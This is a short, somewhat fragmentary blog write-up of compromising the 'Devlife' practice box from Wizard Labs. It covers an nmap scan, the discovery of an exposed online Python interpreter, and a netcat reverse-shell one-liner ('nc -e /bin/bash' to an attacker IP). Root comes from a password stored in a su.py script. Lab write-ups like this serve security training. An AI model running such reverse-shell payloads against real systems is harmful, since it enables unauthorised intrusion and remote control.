Hey guys this is my write-up about Devlife from Wizard Labs which is their second box to retire. Just like dummy it’s another easy box (Difficulty : 2/10) , It’s a linux box and its ip is
10.1.1.20 so let’s jump right in !
We will start with nmap to scan for open ports and services :
nmap -sV -sT -sC 10.1.1.20
Only 2 ports are open , 22 running ssh and 80 running http. Let’s check http.
On the main page we get this “About me” message and nothing else :
/usr/share/wordlists/dirb/common.txt and got these results :
/.htpasswd (Status: 403)
So I checked
/dev and found this
Online Python 2.7 Interpreter :
Great , now we can get a reverse shell in many ways , I just imported
os then did
os.system(reverse shell payload) :
import os;os.system('nc -e /bin/bash 10.xx.xx.xx 1337')
And we owned user !
/home directory of
tedd there is a directory called
.env , Let’s check that.
We notice a python script called
su.py , which runs
su root and uses the password to authenticate :
Now we can
su to root using the password
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.
Previous Wizard Labs Write-up : Wizard Labs - Dummy